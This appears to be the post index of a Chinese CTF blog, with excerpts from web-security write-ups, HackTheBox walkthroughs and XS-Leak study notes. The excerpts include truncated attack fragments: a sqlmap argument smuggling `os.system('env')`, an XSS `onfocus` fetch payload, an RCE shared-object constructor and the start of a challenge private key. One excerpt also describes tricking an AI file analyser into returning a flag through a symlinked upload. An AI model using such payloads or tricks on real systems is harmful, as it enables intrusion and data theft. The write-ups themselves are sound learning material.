ENOCH-lyn Blog

ACTF 2026 web 部分

ENOCH — Mon, 11 May 2026 13:00:00 GMT

CTF越来越没意思了，已经几乎纯AI了 AI越强就越要防AI，于是题目愈发变难，人类也无能为力，最后还是交给AI 至于人类何去何从？希腊奶 12307 看 Dockerfile： COPY --chmod=0600 --chown=root:root flag /flag ... chown roo

记第二届腾讯云智能渗透挑战赛

ENOCH — Fri, 17 Apr 2026 12:43:42 GMT

前言最近打了第二届腾讯云智能渗透挑战赛我们写的agent第一天非常猛，最强的时候冲到了第四，第一天结束后是第五可惜设计时没怎么考虑多点渗透和域渗透，因此后面几天较为乏力，最终只拿到了第19名的名次开源链接如下，仅保留了核心部分，删除了比赛定制功能（比赛API等） ENOCH-lyn/tenc

DesCTF 2026 WP

ENOCH — Sun, 15 Mar 2026 10:29:58 GMT

一个小队去打，最终是拿了三等奖（总榜第五） Misc infrared_code 题目给了一段智能电视遥控器的红外指令数据，以及一张电视输入界面的截图先看红外数据，可以发现里面大量重复出现几类命令码。结合附件里的电视型号资料，可以把几个关键按键对上： 16 对应 Up

HTB Sauna

ENOCH — Wed, 4 Mar 2026 11:57:31 GMT

Sauna 拿shell 扫端口 $ nmap -p- -sV 10.129.95.180 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-03-04 02:54 CST Nmap scan report for 10.129.95.180 Ho

HTB Return

ENOCH — Sun, 22 Feb 2026 09:37:48 GMT

Return 拿shell 先简单nmap看看开放了什么常用端口 # nmap 10.129.242.236 PORT STATE SERVICE 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 13

HTB Timelapse

ENOCH — Sat, 14 Feb 2026 09:34:02 GMT

先nmap PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows

HTB Support

ENOCH — Thu, 12 Feb 2026 10:19:29 GMT

先nmap一下 # nmap -sS -sV -A -Pn 10.129.250.29 <...> PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open ker

HTB Cicada

ENOCH — Fri, 6 Feb 2026 12:19:24 GMT

Cicada 先nmap # nmap -sT -p- --min-rate 10000 -o ports 10.129.254.230 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-06 05:09 CST Nmap scan repo

HTB EscapeTwo

ENOCH — Fri, 6 Feb 2026 10:57:16 GMT

EscapeTwo What is the fully qualified domain name of the machine? # nxc smb 10.129.232.128 SMB 10.129.232.128 445 DC01 [*] Win

XS-Leak学习记录----正文

ENOCH — Mon, 2 Feb 2026 06:32:32 GMT

了解了前置知识后，可以正式进入xsleak的学习了基于网络时序这种方法主要是测量响应时间如果能通过某种方式让命中响应明显变慢或变快，就能通过测量响应时间来判断结果通常以下内容会影响响应时间

XS-Leak学习记录----前置知识

ENOCH — Thu, 29 Jan 2026 09:15:47 GMT

前言 XS-Leaks 的本质是Web侧信道攻击不同于XSS直接执行代码获取敏感信息，XS-Leaks利用浏览器在处理跨站请求时的细微差异，推断用户的状态或敏感数据国际赛关于XSS以及xsleak的考察呈逐渐增加的趋势，所以想着系统性的学学xsleak 学

N1CTF Junior 2026 1/2 出题小记

ENOCH — Tue, 27 Jan 2026 07:18:38 GMT

这次依旧是出了两道题 posetman在预期范围内但是notes差点零解，不得已上了hint是我没想到的可能是大部分师傅都默认http.server 这种官方库应该不存在CRLF这种问题吧，，，以下是wp Notes 题目提供了一个笔记应用，admin用户在初始化时会创建一个包含flag的笔记

SECCON CTF 14 Quals

ENOCH — Sun, 14 Dec 2025 17:00:00 GMT

期末周，还是做了一题就润了 broken-challenge cookie 在 hack.the.planet.seccon 这个域 /hint 路由给了证书私钥 -----BEGIN EC PRIVATE KEY----- MHcCAQEEIDXSM3v5wDSRra/TS/InNmXoVWqm4

CyKor CTF 2025 dbchat wp

ENOCH — Mon, 8 Dec 2025 02:10:29 GMT

最近事情有点多，上线写了一题就去忙其他的了（ dbchat def _generate_sql(self, prompt: str) -> (str, List): m = self._pattern.match(prompt) if not m:

铸剑杯预选赛 WP

ENOCH — Wed, 26 Nov 2025 07:16:49 GMT

CloudEver战队WP 战队排名：12 WEB 浅析PHP原生类题目提供了一个反序列化入口 @unserialize($_GET

RCTF 2025 wp

ENOCH — Tue, 18 Nov 2025 02:00:00 GMT

photographer flag 在 public/superadmin.php if (Auth::check() && Auth::type() < $user_types['admin']) { echo getenv('FLAG') ?: 'RCTF{test_flag}'; }

Infobahn CTF 2025

ENOCH — Wed, 12 Nov 2025 08:38:53 GMT

Sandbox Viewer 未解出，赛后复现给了个iframe，任意写srcdoc然后删除 let iframe = document.getElementById('safe'); iframe.srcdoc = key; iframe.onload = () => { iframe.re

XCTF final 2025 N1Star web wp

ENOCH — Tue, 28 Oct 2025 15:09:40 GMT

比赛时写的，比较简陋 kidding 参考文章curl任意库加载实现远程代码执行 (RCE) 根据文章打包so #include #include __attribute__((constructor)) static void rce_init(void

强网杯2025 CloudEver战队 WP

ENOCH — Sun, 19 Oct 2025 16:00:00 GMT

misc Personal Vault string 搜索flag正则，一把嗦 The_Interrogation_Room import socket, re, string from hashlib import sha256 HOST = "47.94.202.253" PORT = 34

HTB Proxy wp

ENOCH — Wed, 15 Oct 2025 14:15:47 GMT

分析后端有一个flushInterface app.post("/flushInterface", validateInput, async (req, res) => { const { interface } = req.body; try { const

基于LocalStack本地学习AWS

ENOCH — Sun, 5 Oct 2025 12:21:48 GMT

配置皆为windows下的配置首先要有github学生包，最近更新了，免费使用localstack进行本地aws相关开发，不用真的买存储桶先安装aws

SunShineCTF 2025

ENOCH — Fri, 3 Oct 2025 05:03:08 GMT

没啥意思，写了个白盒就润了 Intergalactic Webhook Service dns重绑定攻击 @app.route('/register', methods=['POST']) def register_webhook(): url = request.form.get('url

HTB-Dusty Alleys

ENOCH — Tue, 23 Sep 2025 13:20:44 GMT

题目描述 In the dark, dusty underground labyrinth, the survivors feel lost and their resolve weakens. Just as despair sets in, they notice a faint light:

crewCTF 2025 wp

ENOCH — Mon, 22 Sep 2025 02:56:46 GMT

proxies go过滤器会屏蔽字符串GIVE ME FLAG! go func() { for { n, err := client.Read(buf) if err != nil { if err == io.EOF { slog.Info("Client E

WMCTF 2025 wp

ENOCH — Mon, 22 Sep 2025 02:56:34 GMT

前言好比赛，圆梦一血和二血 Shopping company系列 1 并不是我写出来的上传压缩包，后台会解压并读取文件让AI分析只需要压缩包里面有指向flag的软链接，AI便会返回flag 2 同样方式读取源码，发现压缩包里如果是个executable会被自动运行 #include

HTB-Sattrack

ENOCH — Fri, 19 Sep 2025 07:38:32 GMT

wp边做边写的，有点乱。。。题目是黑盒，只能先看看功能了 /login登录，题目给了partner的密码partner@rockyou.xyz:partn3r123 登录进去之后的几个路由几乎都是纯静态有个share功能，会回显json，例如 /partner/share?t

N1CTF junior 2025 (2/2)出题小记

ENOCH — Mon, 15 Sep 2025 03:12:39 GMT

这次出了两个web题，一个ping一个unfinished 其中ping是当半个签到用的，效果也还算符合预期但是unfinished被非预期麻了直接document.cookie也能泄露出cookies，不用绕httponly（因为打错字了... 以下是wp ping 这题乍一看神似当初入门we

hackthebox Pod Diagnostics

ENOCH — Thu, 28 Aug 2025 12:02:32 GMT

题目描述 We've discovered a mining pod tunnelling underneath a government facility. Luckily, we've managed to connect to an air-gapped control panel that

SEKAI 2025 Discrepancy

ENOCH — Tue, 19 Aug 2025 04:50:06 GMT

本文首发于先知社区（为了赚点积分（探究python中pickle，_pickle和pickletools的解析差异问题前言来看SEKAI 2025的Discrepancy ### IMPORTS ### from pickle import _Unpickler as py_unpickler

LILCTF 2025 wp

ENOCH — Tue, 19 Aug 2025 04:50:03 GMT

前言跟着队伍OTSASumuvior ，最终队伍排名为第一名打了一天这个之后还要去打SEKAI CTF 我曾有一份工作题目描述中有备份，直接开扫，扫到了www.zip 里面是网站源码，包含一堆配置以及密钥审计之后发现只要有UC_KEY就可以备份数据库 api/db/dbbak.php

UIUCTF 2025 wp

ENOCH — Fri, 1 Aug 2025 05:33:12 GMT

前言第二天有事，没怎么写 Ruler of the Universe ${String(value).replace('"', """)} 这地方只转义第一个”,剩下的不会转义,用两个”即可闭合 "" autofocus onfocus="fetch('

Handlebars的ast语法树注入问题

ENOCH — Wed, 23 Jul 2025 08:35:03 GMT

前言先来看一道题（DownUnderCTF 2025），题目只给了一个dockerfile FROM alpine:latest AS flag-builder WORKDIR /build RUN apk add gcc musl-dev RUN cat < getflag.c

DownUnderCTF 2025 wp

ENOCH — Sun, 20 Jul 2025 09:34:40 GMT

前言时间充裕，所以输出还行整体题目难的很难，简单的又挺简单 Sweet Treat admin/review这里没过滤，只要设置profile为payload

春秋云镜 Initial wp

ENOCH — Tue, 15 Jul 2025 14:37:32 GMT

前言想着要学渗透了。学了点前置知识就来打了，结果中途在配置代理，网络上面花了好久而且春秋云镜的靶场。。。好贵记录扫端口 22 80 25 110 80进去是一共登录页，扫出来是think php，直接拿一把梭工具getShell [+] 目标存在tp5_construct_code_exec

L3HCTF 2025 wp

ENOCH — Mon, 14 Jul 2025 03:56:12 GMT

前言终于放假了，有了较为充分的时间打比赛，写的题目数量也比之前多点 best_profile 先看源码 @app.route("/get_last_ip/", methods=["GET", "POST"]) def route_check_ip(username

Google CTF 2025

ENOCH — Mon, 30 Jun 2025 02:01:55 GMT

BpfBox func spawnShell(ctx context.Context) error { withTimeout, cancel := context.WithTimeout(ctx, time.Minute) defer cancel() cmd := exec.Comman

大一总结

ENOCH — Sun, 29 Jun 2025 10:32:44 GMT

前言时间好快，不知不觉大一就要结束了。想着写篇总结吧，为大一生活划上句号，于是有了这篇文章。也不完全是CTF相关，更多的是对整个大一生活的记录与总结吧 8月开学了（22号），怀着懵懂与无知，踏上大学生活看着手里的综合测评细则，想着保研似乎好难，好像要参加好多活动，成绩还要很好才行带着这样的

MaltaCTF 2025 wp

ENOCH — Sun, 22 Jun 2025 08:58:17 GMT

Starboard @app.route('/', methods=['GET']) def index(): order = request.args.get('order', 'DESC') if ';' in order or ',' in order: ret

蓝桥杯国赛网络安全赛道wp 2025

ENOCH — Sat, 21 Jun 2025 06:50:11 GMT

前言平时用的台式机，这次用笔记本发现很多工具和环境没有，加上没怎么准备，打的很烂（毕竟我一个web手咋写全方向题嘛）太惨淡了，wp仅供参考 log 查看日志，注意到 [Unit] Description=System Backdoor Service (Disguised) After=netw

bi0sCTF 2025 wp

ENOCH — Tue, 10 Jun 2025 14:20:02 GMT

两道小web题的wp Qoutes App 这里的new URL 在quoteid为伪协议加路径时就会直接使用其构造url 而fetch是支持data伪协议的，所以直接

D3CTF 2025 wp

ENOCH — Mon, 2 Jun 2025 07:06:46 GMT

前言队伍里出了点小事情，具体请看下方链接关于MNGA在D3CTF 2025被禁赛的情况说明 d3model 打CVE-2025-1550，应该是pickle反序列化相关文章

tryhackme靶场之Frosteau Busy with Vim wp

ENOCH — Mon, 19 May 2025 13:44:57 GMT

这个靶场质量不错扫端口

midnight sun ctf 2025 wp

ENOCH — Sun, 18 May 2025 12:28:18 GMT

web shot host 给了一个上传存储桶的网页大致逻辑 function fread(file) { return new Promise((resolve) => { const reader = new FileReader(); reader.o

parloo杯2025 wp

ENOCH — Sun, 18 May 2025 11:44:36 GMT

逆向 xor c="qcoq~Vh{e~bccocH^@Lgt{gt|g" j=1 for i in c: print(chr(ord(i)^j),end="") j+=1 gogogo for a3 in range(256): encrypted = [

tryhackme靶场之Jurassic Park

ENOCH — Tue, 13 May 2025 12:52:01 GMT

nmap nmap一下，只发现22和80 sql 进入item.php似乎参数id能被注入测试发现当id为123有内容，其他返回no result但是id=5会返回 Dennis, why have

御网杯2025 wp by ENOCH

ENOCH — Sun, 11 May 2025 09:35:22 GMT

最后得分2240 全国排名大概在七百多的样子 web YWB_Web_xff if ($_SERVER["REQUEST_METHOD"] == "POST") { $cip = $_SERVER["HTTP_X_FORWARDED_FOR"]

tryhackme靶场之Rabbit Hole

ENOCH — Wed, 7 May 2025 14:22:00 GMT

最近买了tryhackme的会员，试着刷刷渗透靶场（虽说这个兔子洞不需要会员也能刷）信息收集 nmap开扫 nmap -sC -sV -oN nmap/initial 10.10.192.187 -v 只开了两个端口，ssh和http http服务只有注册登

蓝桥杯2025 wp

ENOCH — Sat, 26 Apr 2025 10:33:12 GMT

flowzip 一把梭了 enigma 给的是赛博厨子，那用赛博厨子解密即可

YNUCTF2025 wp

ENOCH — Fri, 18 Apr 2025 06:29:11 GMT

云南大学校赛，最终成绩如下也是体验一次ak了web的感觉 misc（AK！）随波逐流一把梭，misc基本都能秒 sign1

HackTricks学习记录

ENOCH — Thu, 17 Apr 2025 13:59:20 GMT

最近打校赛，搜索资料的时候看到了HackTricks 感觉里面的很多tricks很有价值，于是记录一下学习的过程 HackTricks - HackTricks unicode问题

codegate wp

ENOCH — Sun, 30 Mar 2025 06:16:06 GMT

Masquerade 几个人一起解出来的,三个人一起才写出一题只能说，国际赛确实难 wp有点乱。。。反正核心考点是：js的toUpperCase加相对路径绕过加domClobbering const { generateToken } = require("../utils/jwt"); cons

NCTF2025

ENOCH — Sun, 23 Mar 2025 13:47:00 GMT

ENOCH个人wp 一个人打，最终总榜24名 sqlmap 经过反复测试最终得到payload http://127.0.0.1/?a=1 -eval=os=__import__('os');a=os.system('env') -v 6 eval可以执行python脚本，由于命令会被分割，选择os

记第一次长城杯线下赛

ENOCH — Tue, 18 Mar 2025 05:38:45 GMT

周六，本来跟着nu1l junior在打一个国际的小比赛，结果下午四点突然FFreestanding学长跟我说要我飞去成都，打长城杯线下赛很懵逼，因为理论上名单里不应该有我，但是他们签到时发现我在名单里面确定可以去打之后，连忙定了一张飞机票飞去成都（比赛是第二天的9点，只能飞过去了），到酒店之后，

TPCTF2025 wp

ENOCH — Thu, 13 Mar 2025 00:26:22 GMT

misc签到 TPCTF{w3LCOMe_70_tpcTF_2025_H0Pe_Y0u_HavE_fun!!} baby layout layout系列有三题第一题是常规Dompurify 提交会把onerror删掉但是这题要求提交一个layout，一

阿里云赛后wp

ENOCH — Sat, 1 Mar 2025 02:03:52 GMT

赛后wp，因为那两天回校，没时间写，只是看了眼题目就要走了虽说感觉写了可能也写不出来 ezoj /source 查看源码 import os import subprocess import uuid import json from flask import Flask, request, js

VN ctf 2025 web

ENOCH — Sat, 15 Feb 2025 22:24:09 GMT

VN_Long 只需要最朴素的解法

nu1l junior 2025 部分web

ENOCH — Fri, 14 Feb 2025 03:33:24 GMT

一共写出来3道题目，剩下两题其实也很接近，只是分别因为对Java和csp不熟悉导致最终没写出来，哎 Gavatar upload.php传入url，有任意文件读取，flag没权限想到一个缓冲区溢出的cve，复现一遍就行读取/proc/self/maps和libc.so.6，放在本地，运行修改后的